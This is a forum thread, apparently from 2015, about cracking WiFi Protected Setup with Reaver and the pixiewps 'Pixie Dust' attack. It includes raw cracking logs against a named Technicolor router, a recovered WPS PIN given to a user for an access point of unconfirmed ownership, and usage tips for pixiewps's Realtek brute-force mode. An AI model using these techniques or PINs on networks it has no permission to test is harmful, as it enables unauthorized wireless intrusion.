[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
soxrok2212 i have tried many time on my network but no result
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Try this PIN and let me know if it works: 76734052
I really hope this is your own AP... by using that PIN you agree that I am not responsible for any trouble you may get into.
@aboulatif
Hey just a curiosity of mine... Is the WAN MAC of that router 18:17:25:2C:0B:75?
he forgot to blank out a line, so no wiire.
"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Model name = model number ...
Example..
RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...
Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )
Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark
Last edited by Saydamination; 2015-04-30 at 22:31. Reason: Ok.
You shouldn't look too much into this. Manufacturers put what they want in those fields. Sometimes they put the valid model number, name, serial or whatever, sometimes they put something else, for example '123456' (or '1234' or whatever) which is like a blank field (I guess they can't put zeroes).
Reaver prints those information only to give you a (sometimes vague) idea of what the chpset brand/model could be. The cracking is performed by pixiewps which don't use this information.
@soxrok2212 here is a cap of the same router type, if you can get me a pin and/or tell me how that would rok ;-)
http://d-h.st/9dE1
Last edited by aanarchyy; 2015-05-01 at 16:35.
Pixiewps 1.1 is out!
See the original thread.
Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?
just add -f 4
And would you add this argument always?
At first i tried it without that option on a router with Realtek chipset and it didn't found the pin then i tried it with -f 4 and it took about 600s then BOOM pin found
QUOTE=psicomantis;44829]Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?[/QUOTE]
Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.
The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.
So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.
Also would you mind replying on the pixiewps thread for program related questions? Thanks.
hi wire can u tell me wich command should i use again realtek chipset?
Hello hanada and welcome to the forum
mmm... ¿Did you read the line just before your message?
Maybe you are not used to forums but you have to locate your question in the correct thread.Originally Posted by wiire
Your question is strictly about pixiewps usage and this thread is about the pixie dust breach
You should have asked your question in this thread
By the way...
..., if you read a little you will find the answer to your question... read before asking, like this the forum is not full of duplicated content
@nuroo @aanarchyy I looked for more info the the data you sent me (caps and reaver output). Upon looking at the beacon frames in the cap that aanarchyy sent me, I see that the Greenwave G1100 uses a Broadcom 802.11N/AC chip, more specifically I believe that it may be the BCM4360: https://wikidevi.com/wiki/Broadcom... AFAIK the G1100 is 3x3:3 on 2.4GHz and 3x3:3 on 5GHz. Assuming so, that leads me to the conclusion above. With the lack of documentation, the only way to find out for sure would be to order one and open it up but FiOS is not available in my area and I don't have $200-$300 to spend on it... I don't even see their firmware available anywhere online...
If i can get my hands on one, i will gladly dump it and share. As of recently, I've been poking around a dump i did the other day of a Belkin F9K1001 v1 ( https://wikidevi.com/wiki/Belkin_F9K1001_v1 ) to see what i can find. Found it at the swap shed of the dump in my town so i had no issues pulling the flash chip off and dumping it. I pick up all kinds of random embeded devices to tinker with. Ive got somewhere over a dozen or so assorted routers/repeaters (Old comcast, old verizon, belkin, dlink, buffalo, netgear, linksys, and some random weird ones) i'd be glad to dump/decompress/decompile/share if anyone would find it usefull :-) I'm kinda sucky at reading assembly but I'm learning...
Any Comcast /Cisco DPC3939?
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No Fios at my location also. Least you where able to deduce its a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if new company came out of the wood work, with new chipset all own their own.
@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.
Not sure, I'll check as soon as i get home. I think the onlyl two comcast ones i have are the old actiontec ones, not sure the chipsets but i'll look.
G1100 firmware is not available for public download.
As per the folks @ dslreports, who have the router - new firmware is made available to customers internally thru their network.